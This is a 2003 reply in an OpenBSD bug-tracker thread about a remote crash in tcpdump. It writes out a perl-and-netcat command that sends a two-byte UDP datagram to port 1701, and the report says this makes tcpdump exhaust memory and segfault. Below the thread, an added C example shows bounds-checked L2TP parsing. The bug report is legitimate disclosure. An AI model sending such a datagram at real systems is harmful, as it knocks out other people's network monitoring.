Re: user/3610: repetable tcpdump remote crash
- To: bugs_(_at_)_cvs_(_dot_)_openbsd_(_dot_)_org
- Subject: Re: user/3610: repetable tcpdump remote crash
- From: Przemyslaw Frasunek <venglin_(_at_)_freebsd_(_dot_)_lublin_(_dot_)_pl>
- Date: Sat, 20 Dec 2003 13:25:01 -0700 (MST)
- Cc:
- Reply-to: Przemyslaw Frasunek <venglin_(_at_)_freebsd_(_dot_)_lublin_(_dot_)_pl>
The following reply was made to PR user/3610; it has been noted by GNATS.
From: Przemyslaw Frasunek <venglin_(_at_)_freebsd_(_dot_)_lublin_(_dot_)_pl>
To: Otto Moerbeek <otto_(_at_)_drijf_(_dot_)_net>
Cc: gnats_(_at_)_openbsd_(_dot_)_org
Subject: Re: user/3610: repetable tcpdump remote crash
Date: Sat, 20 Dec 2003 21:11:00 +0100
Otto Moerbeek wrote:
>> tcpdump -i lo0 -n udp and dst port 1701 &
>> perl -e 'print "\xff\x02"' | nc -u localhost 1701
> I am not able to reproduce this on 3.3-stable and on 3.4-current. My
> tcpdump session prints:
> 20:41:16.157485 127.0.0.1.16993 > 127.0.0.1.1701: l2tp:[TLSOP](0/0)Ns=0,Nr=0 |...
Ok, sorry for the misinformation, it will not work on a loopback interface,
but it's perfectly repeatable when receiving/routing such a datagram on
ethernet interfaces:
<root_(_at_)_ext-fw:/var/log:273># uname -smr ; tcpdump -V 2>&1 | head -n 2
OpenBSD 3.3 i386
tcpdump version 3.4.0
libpcap version 0.5
<root_(_at_)_ext-fw:/var/log:274># tcpdump -i xl1
tcpdump: listening on xl1
On another box:
riget:root:~# perl -e 'print "\xff\x02"' | nc -u x.x.x.x 1701
and tcpdump goes mad:
[...]
invalid AVP 256 invalid AVP 256 invalid AVP 256 invalid AVP 256 invalid
AVP 256 invalid AVP 256 invalid AVP 256 invalid AVP 256 invalid AVP 256
invalid
AVP 256 invalid AVP 256 invalid AVP 256 invalid AVP 256
[...]
consuming all memory. When ulimits are reached, it segfaults.
- --
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin_(_at_)_jabber_(_dot_)_atman_(_dot_)_pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
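An added example, not part of the original message and not tcpdump's code: a bounds-checked walk over an L2TP control message that rejects the two-byte datagram from the report instead of reading past it, and that always advances or stops in the AVP loop. The function name `l2tp_count_avps` is hypothetical and the field layout is assumed from RFC 2661; the report itself does not identify the faulty code.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Header flag bits, layout assumed from RFC 2661 */
#define L2TP_T 0x8000 /* control message */
#define L2TP_L 0x4000 /* Length field present */
#define L2TP_S 0x0800 /* Ns and Nr present */
#define L2TP_O 0x0200 /* Offset Size present */

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Returns the number of AVPs in a control message, or -1 if the
 * datagram is not a v2 control message, is truncated, or is malformed. */
int l2tp_count_avps(const uint8_t *buf, size_t len)
{
    size_t off = 2, need;
    uint16_t flags;
    int n = 0;

    if (len < 2) return -1;
    flags = be16(buf);
    if ((flags & 0x000f) != 2 || !(flags & L2TP_T)) return -1;
    /* Tunnel ID + Session ID, plus every optional field the flags announce */
    need = 4 + ((flags & L2TP_L) ? 2 : 0) + ((flags & L2TP_S) ? 4 : 0)
             + ((flags & L2TP_O) ? 2 : 0);
    if (len - off < need) return -1;          /* flags promise more than arrived */
    if (flags & L2TP_L) {
        uint16_t total = be16(buf + off);
        if (total > len || total < off + need) return -1;
        len = total;                          /* ignore trailing bytes */
    }
    off += need;
    if (flags & L2TP_O) {                     /* Offset Size is the last fixed field */
        uint16_t pad = be16(buf + off - 2);
        if (len - off < pad) return -1;
        off += pad;
    }
    while (off < len) {
        size_t alen;
        if (len - off < 6) return -1;         /* no room for an AVP header */
        alen = be16(buf + off) & 0x03ff;      /* low 10 bits: length incl. header */
        if (alen < 6 || alen > len - off) return -1; /* forces progress, stays in bounds */
        off += alen;
        n++;
    }
    return n;
}

int main(void)
{
    const uint8_t pkt[] = { 0xff, 0x02 };     /* the two bytes sent in the report */
    printf("%d\n", l2tp_count_avps(pkt, sizeof pkt));
    return 0;
}
```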